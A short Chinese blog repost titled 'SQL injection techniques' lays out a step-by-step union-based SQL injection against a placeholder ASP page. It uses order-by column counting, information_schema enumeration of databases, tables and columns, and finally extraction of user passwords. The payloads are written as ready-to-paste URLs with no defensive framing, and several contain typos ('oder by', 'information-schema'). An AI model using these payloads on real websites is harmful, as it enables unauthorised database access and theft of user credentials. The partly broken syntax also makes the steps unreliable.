码迷,mamicode.com
首页 > 数据库 > 详细

SQl注入手法

时间:2018-07-02 01:20:41      阅读:204      评论:0      收藏:0      [点我收藏+]

标签:取数   ...   name   获取数据   color   sel   字段   用户信息   http   

网站http://www.xxxx.com/xxxx/1.Asp?id=1

一、常规注入

  1.猜字段http://www.xxxx.com/xxxx/1.Asp?id=1+oder+by+X        X=(1.2.3.4.5.6.....)直至网站访问正常为止。

  2.查询数据库等http://www.xxxx.com/xxxx/1.Asp?id=1+union+select 1.2.3.database().version() 获取数据库等信息

    或union+select+schema_name+from+information-schema.schemata猜数据库

  3.获取数据库下面的所有表明信息 http://www.xxxx.com/xxxx/1.Aspid=1

    +union+select+1.2.3.4.from+information_schema.tables+where+table_schema=‘数据库名字‘

  4.获取表明下的用户信息http://www.xxxx.com/xxxx/1.Aspid=1

    +union+select+1.2.3.4.from+information_columns.name+where+table_name=‘表明‘

  5.获取指定用户数据信息

    http://www.xxxx.com/xxxx/1.Aspid=1+union+select+1.password.3.4.from+用户名

 

SQl注入手法

标签:取数   ...   name   获取数据   color   sel   字段   用户信息   http   

原文地址:https://www.cnblogs.com/52xuege/p/9251920.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!